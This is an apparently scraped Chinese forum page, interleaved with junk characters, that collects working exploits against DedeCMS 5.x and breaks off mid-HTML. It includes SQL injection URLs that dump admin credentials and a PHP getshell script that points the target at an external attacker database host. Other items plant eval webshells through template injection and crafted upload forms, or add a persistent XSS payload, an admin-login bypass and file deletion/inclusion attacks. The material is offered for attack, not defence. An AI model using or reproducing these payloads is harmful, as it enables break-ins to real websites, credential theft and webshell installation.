|
|
# w. y) U! U. A& GDedecms 5.6 rss注入漏洞6 G6 v" F; j" c2 {6 ]% j& A0 q! Q
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=14 R1 u1 s+ ?) o+ w6 x' d( S
3 j; `* r5 ?6 i; f; `" S
2 n3 V7 c! l+ P7 U2 E$ C; A6 r' u& r Y
4 p4 p$ S8 p% `+ `1 B0 k' l
/ ~1 ^! n, L. q3 `3 i: l% t$ |% E1 k- {& f( @ q$ g0 t& g
9 [- g. D; M" P, c4 } c( ~. }, o! b6 x$ n" L3 w3 f, P* V( C
DedeCms v5.6 嵌入恶意代码执行漏洞! |; g# o( z, U4 {6 ^! ~* \6 j; T# I
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}% x/ S! m& U' P' i" l: F
发表后查看或修改即可执行+ a( j( J6 a* o" P
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
* U# _3 P# x9 ~6 K/ [8 V- x生成x.php 密码xiao,直接生成一句话。& f5 E7 z8 B" k: p' S
w6 T. {* S6 }0 ?% [' i* V/ V
" p) r$ d- f9 J& ?1 k5 j% B8 s, V4 b/ Y; `8 i
' p/ j4 i( P, G2 t' f$ c* L6 q7 r. [: ]* _7 L+ |
" t! ]& `, W( t
7 G' v, a9 A; p. G8 s4 ?; f) Z/ i0 l# M& F: K, e
Dede 5.6 GBK SQL注入漏洞
5 e1 h( L" E2 ?6 `) R8 Dhttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';6 \( s$ O- C, O7 s3 ^/ z# G$ b5 |* h
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe* S# B/ b; G2 D0 T5 A6 d( @
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
; u) M! I7 f. i
5 ^' H) n4 x8 R l! S+ {' h8 Y0 ^- U% s3 p0 L
& }- G9 e" A. i/ n& _5 h
/ y. X& x$ F: H8 W+ t& G- m5 W
/ V6 ~$ ~/ |8 T: w3 X) [5 I
% A) x, M0 w, B( k" T, [1 }+ h; `' H
4 q3 w2 v/ Y8 u8 M
' B/ e7 G) o: ^1 T) tDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞" c4 f7 E! z6 r) ^& g5 M3 ^; ?% w
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` , Y7 a) `& M# R+ R1 s1 l
- E0 |7 X* q8 L( B# z, C
" [0 {8 d2 h: y) t2 P! I* W- z# q7 L' a* U B
1 A8 N) v! i( c3 ^: d. Q
" w o% Q0 l0 ~" C9 e+ u+ S3 a& g4 Y. X
DEDECMS 全版本 gotopage变量XSS漏洞
0 Q4 w/ `) N: h) t: ]7 i. ~$ Q* Z1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
; t3 o4 C. m9 shttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
$ [+ e$ m0 o( h" \+ `
: H. Q3 b& R6 K& {2 O) N8 b# `0 ?4 P$ Z
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
, ^, b! H" l6 }3 X! fhttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda# M/ j9 a6 T- T
Z8 |& r! `$ Y0 f8 `
- T+ B+ g2 c4 N! lhttp://v57.demo.dedecms.com/dede/login.php$ d( w1 d& C0 W8 h* s, K1 m0 `' Q
4 X% r& m2 C$ h' j) ~" J7 M% S1 I1 y
color=Red]DeDeCMS(织梦)变量覆盖getshell$ d: i( o t, f. y, W
#!usr/bin/php -w
5 b- E* J; i# H4 r* f<?php
% Z: }2 d2 r2 f1 [3 R( ~; uerror_reporting(E_ERROR);
' C5 }/ c4 u6 H' y% k4 J$ {set_time_limit(0);
( \1 v, u. @5 q4 u, t2 fprint_r('
, v3 ]$ R2 g- Z: A) J' _DEDEcms Variable Coverage
# B6 B" e0 Y6 K3 I9 k+ rExploit Author: www.heixiaozi.comwww.webvul.com4 [4 `: [- d6 T/ N0 J7 H0 x2 W
);$ N, ?& q: C! i, c
echo "\r\n";7 @0 }- }, X7 ^
if($argv[2]==null){2 r# G) H. X; s6 Q
print_r('2 e* x" k0 M6 ~5 q
+---------------------------------------------------------------------------+4 F3 K w+ D& g, f, N' P
Usage: php '.$argv[0].' url aid path
8 e, o, i& ~# a% S9 Laid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/& ]+ M; I$ d, m' A5 I2 @6 A
Example:
+ B" _3 F) a1 V3 e% ~php '.$argv[0].' www.site.com 1 old
# E G, z/ n% O" H+ b+---------------------------------------------------------------------------+
: a% T' P5 |! d1 V8 u9 i, ^5 `');* a5 z; _# E* G! \" ^" `8 c! _3 p1 [
exit;
% j7 p0 ~( m3 Q2 v}# a0 n3 |* t/ f1 j
$url=$argv[1];! e1 o7 A" O! x+ R# g
$aid=$argv[2];3 R* F' r( A6 O* J( D
$path=$argv[3];; t) y+ M2 n, H2 \
$exp=Getshell($url,$aid,$path);+ p& U& d6 C7 G" p
if (strpos($exp,"OK")>12){/ @- Z; M" N+ [
echo "
" q1 ? f% X, l( z& I/ IExploit Success \n";
# x, l* o( D9 _3 P# X6 ^4 tif($aid==1)echo "8 o8 Q2 K' A$ D
Shell:".$url."/$path/data/cache/fuck.php\n" ;
9 y3 C P+ j# K5 ^8 c
, T! I% _8 E- E" P( ^* |
& b, w; ~* h/ b/ l w! gif($aid==2)echo ". i% h5 S- ?( J( g* |0 d" n5 n
Shell:".$url."/$path/fuck.php\n" ;
7 t2 X' I: A0 s% [3 R1 ^7 {# r5 y7 ]2 ?$ _1 i
( x2 G3 O8 I% { F- N1 V `& b8 dif($aid==3)echo "
9 {3 o, ~& A& G5 NShell:".$url."/$path/plus/fuck.php\n";
8 e) }% g" a4 n, v9 f
2 E3 U" D* i- O# K6 J9 o8 f, h8 C8 b g4 a, m/ S
}else{3 O* g l; `; W2 h
echo "& M# q( A- w+ `% C
Exploit Failed \n";2 f) G6 X8 D3 l O; G
}
* Z- ?1 }; J, {3 {function Getshell($url,$aid,$path){
& l+ H& G) j" R: G: x$id=$aid; S, s- p. g0 [& A
$host=$url;
' q" Z' z0 K4 N; L2 A4 l$port="80";, A! |$ T4 h W* r: \3 R
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";3 f0 E* r2 }$ f5 t! P
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";# `: C& |0 v- B; J+ X1 L# ]
$data .= "Host: ".$host."\r\n";
5 m6 t" o; @5 K% m* x$ ]$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";- W9 ^% J g8 h* V: a
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
. @5 ~* ~9 w$ q$ X2 Y$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";! S5 @. g! p! W/ A
//$data .= "Accept-Encoding: gzip,deflate\r\n"; t% ^: ]8 c8 ^' q# Z
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
! M9 u/ G/ B+ J$data .= "Connection: keep-alive\r\n";
- _ a! q. r* W. Q/ i! i& z# l# M$data .= "Content-Type: application/x-www-form-urlencoded\r\n";0 }0 V/ R G' G) P
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";! A7 O" l4 n2 e! f( h& @! u
$data .= $content."\r\n";" ?9 y! _! o6 Z( s* X0 V' G
$ock=fsockopen($host,$port);9 J9 v3 L' m+ E
if (!$ock) {7 `5 M5 E/ N+ Q' A$ P) v7 t9 R
echo "- }& M+ m. c* F, S7 V J
No response from ".$host."\n";
- |- P% q% R! |5 t# B}/ C1 Q7 @+ K# f
fwrite($ock,$data);
" G6 M8 G n5 Z' d3 a% ewhile (!feof($ock)) {( a/ u* [) n/ {& M
$exp=fgets($ock, 1024);
- y- I" u) D1 c2 C3 v- Sreturn $exp;
y( }( @1 i4 k4 i# n9 l}
4 G/ x$ h7 G: V- t" M}
6 X5 l0 |( X$ F* q- s6 S i3 M1 V% P3 k& r
: V: }" d0 n6 M/ q1 ??>6 [1 X! c6 @! V9 B6 y. f- c Y
q3 U' t$ h& V- [/ ^
Y+ o5 z* G' u0 p% C% H2 ]) ~3 X0 ?% l s' r8 E
5 l# D W* r u# [
$ E [3 L9 k4 {" _+ e4 \- P6 T
# l: O: F; K& d7 r" q* X( t( S+ S3 O$ i) A9 j3 |
# T- Q: Q1 |6 E$ h" }! R, S
6 L7 O+ z! h, V9 N1 `4 o. Z5 c6 ~& ?% }+ `
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)" A% {$ E; l* s1 h( D
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root0 G+ F4 }4 g+ Z( b' D
* G2 t. Q* b3 a) u L
, ]: ^& s0 A) u+ ?( I" R# u# \
把上面validate=dcug改为当前的验证码,即可直接进入网站后台0 z" Z8 W6 N& p& o1 I. y4 c- C
3 t' R2 L& U8 G+ v! n; G# F% v# l1 l w1 g+ G
此漏洞的前提是必须得到后台路径才能实现
4 P1 c# T% I& t4 h+ D! v. e; m& p6 L1 l/ _% s
0 S$ N" ~# l) h2 ?/ p3 q
7 ?+ u& B. N+ B$ L0 \
5 E5 ]1 t1 c. M( X. ?! T( V+ L
9 j$ [0 V* g3 K1 ^+ d) J3 Z& l
8 H. y; H& g3 _0 ]& b P( j9 A" F. s
% b; a: m" A/ c
4 y& K. v- B" V3 A- b
% R+ f3 O0 X4 O% J" n
Dedecms织梦 标签远程文件写入漏洞
+ v7 }. g# B+ [$ @1 [, x) A前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
8 i# K8 }0 ]( p( V- n* Y! o6 d( H4 i1 f2 ?' V6 [8 c& r
% I; ^+ A3 u* C8 s
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 3 S' C9 C1 d4 v5 Y9 y2 \1 m7 x0 y
<form action="" method="post" name="QuickSearch" id="QuickSearch">% ^2 t. z# g! o: y7 I: x. L! [* j
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />! |* s: ~5 o) ?4 h6 e
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
" j: y* ~1 p1 U! Y4 P; t<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
1 d/ o2 w, U, `1 D! X2 J" [$ b<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />4 w9 s/ u6 u$ `# u' P
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />+ v/ N! E# r( w( D9 p
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
8 [" M# a; H4 @. }0 G R _<input type="text" value="true" name="nocache" style="width:400">( K7 W9 }! p# K* t( [) D; r
<input type="submit" value="提交" name="QuickSearchBtn"><br />. H; m. P c$ e/ P( A7 Z
</form>& p5 X, O8 [% n+ t. q( \6 y
<script>* v( I# M E" M) a* d
function addaction()$ U' H. P8 P2 }% l5 w
{8 U3 k, W( }# { |2 U# R* O) P
document.QuickSearch.action=document.QuickSearch.doaction.value;
4 @& _; q3 |# b3 m, z8 l( \}
- r. m7 L& O% Z0 L# {</script>
. Z) ^4 B$ b% P! m
# h2 Y5 ^8 y$ U* m; b6 H! N0 n+ \5 o* [, G' }1 K1 u
! V. w! W6 J0 [0 L- `( k% _$ n. y, T" }4 V5 D N" W
0 S6 w3 |' V/ I# z- X- {# l3 N2 D$ f7 u+ p* @* E# |9 n
- q) @. y; k- ~4 I! t+ j# _8 T& Q6 d# q' K5 t/ r) z& j9 W
l( }- S0 z/ a8 x! a! ^! a: ?
" z: y/ c+ C" R+ G1 QDedeCms v5.6 嵌入恶意代码执行漏洞 x& c" u8 X. }$ J* @
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
8 M0 X( G9 v. j7 la{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}8 i2 j; d) _1 L1 p: I2 Z$ b
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
6 X* ~1 O/ w% j8 R- O3 YDedecms <= V5.6 Final模板执行漏洞
+ C; [- F- ]3 O* m2 N8 m注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
9 E* v/ T( L- }2 A Y( Y Xuploads/userup/2/12OMX04-15A.jpg% p$ e4 o7 E! W% u, }- R
i& ]- u5 s F0 b" ]9 c! E% b2 N8 y# W# ?4 R
模板内容是(如果限制图片格式,加gif89a):9 P2 g% e" z3 S- n" [6 e
{dede:name runphp='yes'}
9 `1 c1 f0 N* e$ B( c$fp = @fopen("1.php", 'a');, e4 s( m' L# ~5 w$ Z
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");& w9 S$ Q! f( a0 M; j$ O
@fclose($fp);' K V4 V k* Q, [, I2 {
{/dede:name}
# @ f: w9 e4 J j2 D* i2 修改刚刚发表的文章,查看源文件,构造一个表单:
( H/ `$ E- B8 @4 i7 @<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">8 C- S6 Z4 P: U" ~- ?7 }5 `7 I1 U
<input type="hidden" name="dopost" value="save" />5 S# a2 a. @3 B y6 d# t
<input type="hidden" name="aid" value="2" />
% x" j8 s" U9 R1 Z7 P7 @: }) L<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />7 ~& u+ m! h; v% G Y
<input type="hidden" name="channelid" value="1" />; Q* V$ x+ o1 e7 L: Z
<input type="hidden" name="oldlitpic" value="" />
6 v% z' m. q, @0 l! g9 n3 P3 T# T% [<input type="hidden" name="sortrank" value="1275972263" />
3 {- w, m% m% {3 m5 r$ G$ l @2 h6 i5 x
, c" C l& J7 x, ?+ J. B<div id="mainCp">
! O4 P5 O- B8 g0 y/ O/ d+ P<h3 class="meTitle"><strong>修改文章</strong></h3>& ?% _& U+ ~; N
, F$ I: {: c" ~" X$ d
; m5 n) n( v, G6 T<div class="postForm">
; f- g4 i3 g% F o# z8 H<label>标题:</label>
2 ~0 v: D, E) j<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
) L$ S* y& m# o" `3 G6 E+ y u8 `! c3 K) z$ P. E
9 V6 G: D+ S0 P# ?8 g- |" |- d<label>标签TAG:</label>
/ p- W7 o ^7 j; d<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)) v% H3 z+ @' _/ p. `& a) B
0 V9 g: h/ T. o( M
2 F) _; o) M6 z b9 u) r; H
<label>作者:</label>
, @5 v) N/ {; M; y6 m5 |<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>1 h! M: B6 }9 X. Y
5 l4 j1 m; [2 F% d
9 q: ~( c" ]4 }4 b' Y3 n' x<label>隶属栏目:</label>0 |7 D, P% \7 r
<select name='typeid' size='1'>
" O- z3 O$ l6 S- W+ a- A<option value='1' class='option3' selected=''>测试栏目</option>
6 \* h% V! w* H5 E- P" Q</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
) E3 P, M* i* V8 g& s0 A$ y2 c4 \8 A }. o" n K: i% Q& t
7 I, s7 F/ a/ U T1 [ i# G; w* e& u<label>我的分类:</label>
0 ~9 s. k- U3 P<select name='mtypesid' size='1'>) u) y* n1 v) h. x; W
<option value='0' selected>请选择分类...</option>
, F1 _2 B$ v$ Q7 Q; e<option value='1' class='option3' selected>hahahha</option>
# U) X# V3 Q" u3 L$ H d</select>: Y' ]8 x1 `2 |% c* F5 q
7 w. K+ _# ^! v: f
5 k4 D- f6 g$ `! _( D/ W: y<label>信息摘要:</label>
3 y, _9 Y0 }1 X/ {" H" e4 I1 M<textarea name="description" id="description">1111111</textarea>
5 x7 G1 H& f# a, }(内容的简要说明)
|! C! a6 j, ]8 E' n7 ~* E1 n: z
( s& y, n6 y( q3 s
# u7 }* E' w z1 M3 p& t<label>缩略图:</label>% g5 e" Q) Q$ J1 @2 Z! [
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/># {1 b$ R# v9 D
1 ?+ O& j# x# t. W! k8 C N- R5 W0 }9 b1 h
<input type='text' name='templet'
0 a$ c1 g8 L1 [5 @- j4 S# Evalue="../ uploads/userup/2/12OMX04-15A.jpg">
* Z' W9 V0 R1 W$ u; b% [<input type='text' name='dede_addonfields'+ B& `6 ^% I2 q5 [: P
value="templet,htmltext;">(这里构造)
: V" _" @# F& @+ w1 @/ k</div>
9 s( M$ M3 l |5 w1 p+ [
6 [' h$ Z5 h8 n- o t" m3 H: H. @
9 _( U7 q* P% s6 _2 X<!-- 表单操作区域 -->/ u% K: v5 t+ O8 c' j. R; a
<h3 class="meTitle">详细内容</h3>. ^) G2 r x( T, L6 t( ^& r
! b+ ^/ i1 S, Q( [! m, A
- n$ G7 J2 p! w' U& h
<div class="contentShow postForm">
* A" i, H$ F0 |5 Z<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>% M! T. z7 H% r _2 h W8 j
+ o% F3 r7 {- _7 R
2 r$ ]+ k8 |3 g+ _" w Z T
<label>验证码:</label>
$ T; C0 w6 o/ N5 j( A" m<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />& q1 J% \& ]+ B& r0 s( L
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />& g* {& a% |, C' N& q
/ w5 D3 h7 } s% m6 p
* M/ A& P( N6 R* T; {0 o3 k<button class="button2" type="submit">提交</button>( p# {; H2 \* B, i6 A
<button class="button2 ml10" type="reset">重置</button>9 L! m% w D- @5 [+ T8 T2 E( B
</div>& l$ K1 n, X, M
! F; u: r: |; v3 [; G) k7 ]& x. |' D2 t Z
</div>) q$ c: `$ W. [- g8 M( X3 n5 n _
% ~1 i; j% e$ d% K4 X) a& W
7 @1 P+ t- O) h" Q. W: d7 U
</form>
5 a. f- l+ n! T0 X# l* K8 x: V0 ~0 q2 ~/ ^" {9 O; g9 n( F
% z) O, K( D: Z9 d* o4 d: G提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
7 V3 V" H. L) C/ _% J+ D/ q假设刚刚修改的文章的aid为2,则我们只需要访问:/ ? S, c+ w3 |, |
http://127.0.0.1/dede/plus/view.php?aid=2
6 y% C% p0 F( p9 a# r# X8 _即可以在plus目录下生成webshell:1.php s, v9 X+ l" [5 E! W6 l
# D' W+ p7 g; U6 Z- w* i9 c* w& ?+ k
. o' i2 D. ~7 G* ]9 c1 R
* d: Z8 g2 k9 u1 B! M5 z% |* ^
; V' G; X; z! F. \
% a6 x0 s7 }! L* ?7 |
$ E/ v0 P% G! e! O
4 G0 p; h' z: f4 f0 Q7 }9 v6 B4 w' l. c: u5 ^! [
% j9 |# Q6 c& W5 { h: B$ Z
9 o) E- a4 n- V) e6 W" X5 |5 q, i+ E$ F8 q
) ^0 g. X1 I) W: T- l
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)! y6 o+ O1 v' D! |0 T8 B
Gif89a{dede:field name='toby57' runphp='yes'}1 A9 q$ k5 r9 R4 C: g3 b k
phpinfo();, W9 X7 x4 T0 _; `9 \$ O
{/dede:field}
1 o, k+ N5 [6 R4 G+ A9 Q保存为1.gif
/ M5 j* N4 o! q' {3 X8 U<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
/ k1 N, P F8 r) Q c' B" @/ w- D. J<input type="hidden" name="aid" value="7" />
$ n% Z1 J. W' m/ J5 q% q- @<input type="hidden" name="mediatype" value="1" />
* O5 C! i) l2 a& a- B- R<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> % Y1 K* x8 v7 S' {
<input type="hidden" name="dopost" value="save" /> ' a8 }$ t# ]$ d3 x, l! s
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> + M; j. R+ C T" G
<input name="addonfile" type="file" id="addonfile"/>
4 O" i* }2 h: s, c! K7 S$ B, J<button class="button2" type="submit" >更改</button>
; E& q" ]/ Q" F9 b! Z</form>
& G8 G# F1 a' m# @% J7 G* z# X$ R' m. y' e0 C. g
1 n: A8 k+ \, v% K$ e构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
: ^( G; u% p! x' ]发表文章,然后构造修改表单如下:
2 H# F& P1 f/ V$ `' @9 m- }/ {) w
: m( r* N8 X/ ?4 m( M; S2 s% |, f<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
& A2 ^+ `, x! O7 F) ?. P( x. p; m<input type="hidden" name="dopost" value="save" />
3 G" q8 w1 k) i$ f<input type="hidden" name="aid" value="2" /> ' y+ Q: c; ?0 {) [) A- ?9 P: W9 X
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
$ {7 Q% r4 L, u# {8 x$ Q<input type="hidden" name="channelid" value="1" />
9 B5 L, L$ O) ]) r" J0 C<input type="hidden" name="oldlitpic" value="" /> . e7 F; g" @# ?6 y# `! z5 D3 k( b+ P0 E6 C
<input type="hidden" name="sortrank" value="1282049150" /> . W3 j- X% x& s
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> ' n8 l( K: _$ N' N
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> 2 C. l# D8 |, o
<select name='typeid' size='1'>
: k% Y7 L/ D7 @- a" ^, C<option value='1' class='option3' selected=''>Test</option>
' A9 T- A4 Q0 [! |$ j" w w8 e<select name='mtypesid' size='1'>
1 A, S* K' D; }4 c: @! y<option value='0' selected>请选择分类...</option>
1 d% L* I: M! g( o<option value='1' class='option3' selected>aa</option></select>
$ Z5 Y& d. ^1 o( ~$ n- {<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
( ?4 j. q, X! E# z<input type='hidden' name='dede_addonfields' value="templet">
5 m! ^; D7 M0 H<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
7 C; w- p& k& L& ~6 N' K, r<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
8 K4 H X/ o2 Q$ r<button class="button2" type="submit">提交</button> 0 f0 I. C5 a) G5 Y3 f! G x
</form>
) B9 \8 M8 K& Y1 t
: o- E' n5 O7 L4 c6 i e
8 a! u+ v- K$ b* ^" n6 L- x7 H" v6 r
2 V3 }4 ~" q# U4 o! J" X
E6 A3 W% n1 H9 }( g3 H+ i5 J; O+ G) c
- \6 P# O. G* Z3 q1 T% w+ l8 `. a% E) c* y9 [6 j
6 C T6 s! ~1 v( d. J4 x
. K6 X, n7 X0 G# b u; S4 o9 o
* e. X$ _9 h- S" F1 ^
8 o5 v, n& ?4 a# A7 f8 {织梦(Dedecms)V5.6 远程文件删除漏洞
5 t1 P8 N% M% _* z% Ghttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
, \% e, b# X4 t4 {2 c3 J0 |" T/ ` J. W4 R0 M
9 S9 t( ^; I6 Q# i
! c* U7 P* \! V/ n3 v
1 R0 z) H; f% D5 d* f! s3 B2 s( ?+ |: i& v+ K+ d
! d6 E- ~8 V+ b6 E2 t; Y5 [$ ]
; ]! l }/ ~2 E d6 o9 F
7 ~$ J. g, O z6 j& x$ s7 M% A8 s, r3 A T& [( f
; s) F/ y! u' p5 \, V( W( @- u& {
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 * i2 y9 i1 x# t3 e# X
http://www.test.com/plus/carbuya ... urn&code=../../
8 k3 F. j0 R% i; ^& H' P" R/ W* `- W7 ]) u3 H
1 t2 c4 F; }0 W( v4 Q$ d, y9 E- l" `# j; [4 `
! e6 x6 G1 B- b" [3 n* b
3 E8 H6 K1 s3 j$ P* J9 ~/ |4 T1 Q6 H
1 F) r3 t) B3 H/ h3 Q9 E; R
- K9 v- w+ U1 o8 a. o" g' _
4 ~2 y/ ]/ }$ z% }+ U3 M8 [
9 b6 d( h0 ~8 h9 A! ^7 lDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 G$ H) P& C* S& K" [
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`! B5 F2 W9 k1 _9 }. ], g, i
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
! q# ?5 X& \& | N
* m% G2 e/ j, o9 S9 O" Y. p
# W! A. a p* N, y6 J# U9 w# J
' |, ~1 T) j* [6 B$ M! y0 u3 e7 {3 i$ y
3 N& L$ ]8 r. l- p8 F6 Y& D9 _4 _& g7 f2 A$ G: Q( g
# D, I1 y& v$ M- F
4 l7 @, R4 k7 x# X8 ~* i( N( i8 I, N; U0 v0 W8 ~
- H% p2 @4 d. { w2 @3 A( p+ s
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
j" e; T& L; ]& G7 A0 |4 p Vhttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
! j$ M# C4 f8 ?1 B% J |3 P' P- Z; y0 T* m
P b" O9 E3 |5 I4 M% `$ I8 d+ C* C G/ R b
9 [+ W ^" Z4 _# }3 c
3 h' H- n1 T @7 g* l' _
9 E! T0 X: K0 F6 r- Z1 @8 f- i/ D: k$ o3 V2 W- j8 X# z
+ O! s; m0 l$ z- V/ z, x; z
; ~8 c" l4 j; e9 b8 {; Q* P3 t
2 @/ |7 y ~# R* [3 d织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
: }4 T8 n0 y/ W {) W2 P) R8 s<html>
) N$ V( |3 l3 m! x3 s) I0 r<head>
